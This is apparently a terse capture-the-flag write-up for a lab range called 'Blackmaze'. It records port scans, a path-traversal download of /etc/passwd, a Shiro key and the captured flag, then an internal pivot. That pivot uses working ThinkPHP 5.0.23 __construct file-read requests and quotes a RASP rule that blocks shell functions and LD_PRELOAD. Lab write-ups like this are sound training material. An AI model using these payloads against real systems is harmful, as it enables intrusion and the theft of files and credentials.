Blackmaze
1. 入口 8080
┌──(root㉿kali)-[~/Desktop/ChunQiu/blackmaze]
└─# fscan -h 39.98.109.229
[852ms] [*] 端口开放 39.98.109.229:22
[883ms] [*] 端口开放 39.98.109.229:8080
[884ms] [*] 端口开放 39.98.109.229:8081
[5.6s] [*] 网站标题 http://39.98.109.229:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://39.98.109.229:8080/login;jsessionid=1D34F65E9413D239BD685DE9E952937C
[6.2s] [*] 网站标题 http://39.98.109.229:8080/login;jsessionid=1D34F65E9413D239BD685DE9E952937C 状态码:200 长度:8663 标题:Login
http://39.98.109.229:8080/file/download?path=../../../../../../etc/passwd
Key n5RYm2z1V60+D+OiNLXksQ==
/tmp >/usr/bin/base64 /flag |base64 -d
flag{16fc0d69-a7b9-0a5d-5ff6-8eab6776774f}
webapp@Shiro:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:1e:ec:a4 brd ff:ff:ff:ff:ff:ff
inet 172.22.10.22/24 metric 100 brd 172.22.10.255 scope global dynamic eth0
valid_lft 1892156245sec preferred_lft 1892156245sec
inet6 fe80::216:3eff:fe1e:eca4/64 scope link
valid_lft forever preferred_lft forever
webapp@Shiro:~$
172.22.10.3: [22 80] tp rce
172.22.10.154: [22 80]
172.22.10.22: [22 8080 8081] 入口 已拿下 shiro LFI
172.22.10.155: [22 80]
[+] PocScan http://172.22.10.3 poc-yaml-thinkphp5023-method-rce poc1
2. 172.22.10.3 thinkphp rce
2.1. LFI
POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: 172.22.10.3
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 89
Connection: keep-alive
_method=__construct&method=GET&filter[]=highlight_file&server[REQUEST_METHOD]=/etc/passwd
2.1.1. rasp策略
POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: 172.22.10.3
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 102
Connection: keep-alive
_method=__construct&method=GET&filter[]=highlight_file&server[REQUEST_METHOD]=/opt/plugins/official.js
- command: blocks system/exec/passthru/proc_open/shell_exec/popen/pcntl_exec/assert
- putenv: blocks LD_PRELOAD/LD_AUDIT/GCONV_PATH
- eval_regex: action=
ignore(未激活!)
2.1.2. mysql密码
POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: 172.22.10.3
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 114
Connection: keep-alive
_method=__construct&method=GET&filter[]=highlight_file&server[REQUEST_METHOD]=/opt/logs/alarm/alarm.log.2025-01-20
3. 172.22.10.154
22/tcp open ssh
80/tcp open http
4. 172.22.10.155
22/tcp open ssh
80/tcp open http
9501/tcp open unknown
